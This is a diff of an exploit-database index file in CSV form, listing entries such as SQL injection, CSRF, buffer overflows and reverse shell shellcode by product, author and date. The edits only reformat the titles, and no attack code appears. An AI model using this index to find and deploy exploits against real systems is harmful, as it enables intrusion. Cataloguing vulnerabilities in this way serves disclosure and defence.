COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 38917,platforms/osx/dos/38917.txt,"MacOS X 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 -38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 +38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 -38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows PhishingAlert Security Bypass Weakness",2013-12-07,Jackmasa,windows,remote,0 +38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass Weakness",2013-12-07,Jackmasa,windows,remote,0 38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - CSRF",2015-12-10,KnocKout,php,webapps,80 38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 -38930,platforms/multiple/dos/38930.txt,"Rar CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0 +38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0 38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed Executables",2015-12-10,"Google Security Research",multiple,dos,0 38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 38933,platforms/multiple/dos/38933.txt,"Avast - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 38934,platforms/windows/dos/38934.txt,"Avast - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0 38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 -38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure",2014-01-01,anonymous,linux,local,0 +38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0 38938,platforms/php/webapps/38938.txt,"xBoard - 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 -38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0 +38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall - Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0 38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 38944,platforms/php/webapps/38944.txt,"Command School Student Management System - /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38945,platforms/php/webapps/38945.txt,"Command School Student Management System - /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35220,7 +35215,7 @@ id,file,description,date,author,platform,type,port 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - productdtl.php (prodid) SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 -39097,platforms/linux/remote/39097.txt,"Red Hat Piranha Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 +39097,platforms/linux/remote/39097.txt,"Red Hat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injection",2014-01-13,"Rohan Stelling",php,webapps,0 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102 @@ -35263,18 +35258,18 @@ id,file,description,date,author,platform,type,port 39004,platforms/multiple/dos/39004.txt,"Wireshark - find_signature Stack-Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 39006,platforms/multiple/dos/39006.txt,"Wireshark - getRate Stack-Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 -39007,platforms/java/remote/39007.txt,"FireEye Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 +39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 -39010,platforms/linux/local/39010.c,"Gentoo Local Priv Escalation in QEMU",2015-12-17,zx2c4,linux,local,0 +39010,platforms/linux/local/39010.c,"QEMU (Gentoo) - Local Priv Escalation",2015-12-17,zx2c4,linux,local,0 39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script - /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping Admin Password Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping - Admin Password Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 +39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 39016,platforms/php/webapps/39016.txt,"Joomla! Almond Classifieds Component - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0 39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 -39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite Remote Security",2014-01-14,Oracle,multiple,remote,0 +39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 39019,platforms/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 @@ -35292,7 +35287,7 @@ id,file,description,date,author,platform,type,port 39033,platforms/php/webapps/39033.py,"Joomla 1.5 < 3.4.5 - Object Injection RCE X-Forwarded-For Header",2015-12-18,"Andrew McNicol",php,webapps,80 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion Exploit",2015-12-18,bd0rk,php,webapps,80 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0 -39099,platforms/php/webapps/39099.txt,"Rhino Cross-Site Scripting and Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0 +39099,platforms/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0 39038,platforms/php/webapps/39038.txt,"PFSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0 39039,platforms/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",multiple,dos,0 @@ -35316,11 +35311,11 @@ id,file,description,date,author,platform,type,port 39058,platforms/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",php,webapps,0 39059,platforms/php/webapps/39059.txt,"WordPress Global Flash Gallery Plugin - 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0 39060,platforms/php/webapps/39060.txt,"XOS Shop - 'goto' Parameter SQL Injection",2014-01-24,JoKeR_StEx,php,webapps,0 -39061,platforms/android/local/39061.txt,"GoToMeeting for Android Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 +39061,platforms/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 39062,platforms/php/webapps/39062.txt,"ZenPhoto - SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0 39063,platforms/php/webapps/39063.txt,"WordPress WP e-Commerce Plugin - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 -39065,platforms/php/webapps/39065.txt,"Eventum Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0 +39065,platforms/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0 39066,platforms/php/webapps/39066.txt,"Eventum - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0 39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0 @@ -35334,7 +35329,7 @@ id,file,description,date,author,platform,type,port 39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39078,platforms/php/webapps/39078.txt,"Web Video Streamer - Multiple Security Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0 -39079,platforms/php/webapps/39079.txt,"Atmail WebMail Message Attachment File Name Reflected XSS",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 +39079,platforms/php/webapps/39079.txt,"Atmail WebMail - Message Attachment File Name Reflected XSS",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 39080,platforms/php/webapps/39080.txt,"Atmail WebMail - searchResultsTab5 filter Parameter Reflected XSS",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 39081,platforms/php/webapps/39081.txt,"Atmail WebMail - INBOX.Trash mailId Parameter Reflected XSS",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 39082,platforms/multiple/dos/39082.txt,"PHP 7.0.0 - Format String",2015-12-23,"Andrew Kramer",multiple,dos,0 @@ -35366,7 +35361,7 @@ id,file,description,date,author,platform,type,port 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x - 'ajax.autosave.php' Multiple SQL Injection",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 -39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 +39118,platforms/php/webapps/39118.html,"osCmax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 @@ -35383,9 +35378,9 @@ id,file,description,date,author,platform,type,port 39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root",2015-12-30,"Larry W. Cashdollar",linux,local,0 39135,platforms/php/webapps/39135.php,"WordPress Felici Theme - 'uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 -39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 +39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0 -39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 +39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 39139,platforms/php/webapps/39139.txt,"PHPFox Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0 39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 @@ -35404,7 +35399,7 @@ id,file,description,date,author,platform,type,port 39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0 39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router - password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 -39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 +39155,platforms/linux/remote/39155.txt,"lxml - 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 39157,platforms/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0 39158,platforms/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - DoS",2016-01-03,Vishnu,windows,dos,0 @@ -35425,7 +35420,7 @@ id,file,description,date,author,platform,type,port 39173,platforms/php/webapps/39173.txt,"Caldera - /costview2/jobs.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 39174,platforms/php/webapps/39174.txt,"Caldera - /costview2/printers.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk - Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0 -39176,platforms/php/webapps/39176.html,"TOA Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps,0 +39176,platforms/php/webapps/39176.html,"TOA - Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps,0 39177,platforms/multiple/dos/39177.py,"VLC Media Player - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos,0 39178,platforms/php/webapps/39178.txt,"CMS Touch - pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 39179,platforms/php/webapps/39179.txt,"CMS Touch - news.php News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 @@ -35435,7 +35430,7 @@ id,file,description,date,author,platform,type,port 39183,platforms/windows/dos/39183.py,"ALLPlayer - '.wav' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0 39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - TCP Reverse Shell with Password Prompt shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 -39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 Authentication Bypass",2014-05-15,jkmac,multiple,remote,0 +39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0 39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injection",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35444,21 +35439,21 @@ id,file,description,date,author,platform,type,port 39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L - File Upload",2016-01-07,Metasploit,hardware,webapps,0 39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0 39194,platforms/hardware/webapps/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,webapps,0 -39195,platforms/hardware/remote/39195.c,"Foscam IP Camera Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0 +39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0 39196,platforms/linux/remote/39196.py,"Apache 'mod_wsgi' Module - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0 39197,platforms/php/webapps/39197.txt,"WordPress Booking System (Booking Calendar) Plugin - 'booking_form_id' SQL Injection",2014-05-21,maodun,php,webapps,0 -39198,platforms/php/webapps/39198.html,"User Cake Cross-Site Request Forgery",2014-05-25,"Dolev Farhi",php,webapps,0 +39198,platforms/php/webapps/39198.html,"User Cake - Cross-Site Request Forgery",2014-05-25,"Dolev Farhi",php,webapps,0 39199,platforms/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",python,webapps,0 39200,platforms/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component - SQL Injection",2014-05-24,"ali ahmady",php,webapps,0 39373,platforms/osx/dos/39373.c,"OS X Kernel - no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 -39205,platforms/multiple/remote/39205.txt,"Castor Library XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0 +39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0 39206,platforms/php/webapps/39206.txt,"webEdition CMS - 'we_fs.php' SQL Injection",2014-05-28,"RedTeam Pentesting GmbH",php,webapps,0 -39207,platforms/linux/local/39207.txt,"dpkg Source Package Index: pseudo-header Processing Multiple Local Directory Traversal",2014-05-25,"Raphael Geissert",linux,local,0 +39207,platforms/linux/local/39207.txt,"dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversal",2014-05-25,"Raphael Geissert",linux,local,0 39208,platforms/windows/dos/39208.c,"Microsoft Windows - Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",windows,dos,0 -39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 +39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 39210,platforms/php/webapps/39210.txt,"Seo Panel - 'file' Parameter Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps,0 39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 @@ -35467,11 +35462,11 @@ id,file,description,date,author,platform,type,port 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash PoC",2016-01-11,"Mohammad Reza Espargham",windows,dos,0 39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Local Root Exploit",2016-01-11,"Hacker Fantastic",linux,local,0 -39218,platforms/windows/remote/39218.html,"TrendMicro node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 +39218,platforms/windows/remote/39218.html,"TrendMicro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 39219,platforms/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",multiple,dos,0 39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (1)",2016-01-11,"Google Security Research",windows,dos,0 39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0 -39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 +39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0 39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0 @@ -35521,7 +35516,7 @@ id,file,description,date,author,platform,type,port 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0 40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0 -39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 +39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0 @@ -35532,12 +35527,12 @@ id,file,description,date,author,platform,type,port 39287,platforms/php/webapps/39287.txt,"WordPress WP Content Source Control Plugin - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps,0 39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",multiple,webapps,0 39289,platforms/php/webapps/39289.txt,"ArticleFR - 'id' Parameter SQL Injection",2014-08-20,"High-Tech Bridge",php,webapps,0 -39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 +39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 -39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 and Thunderbird 3.1.20 Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 +39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 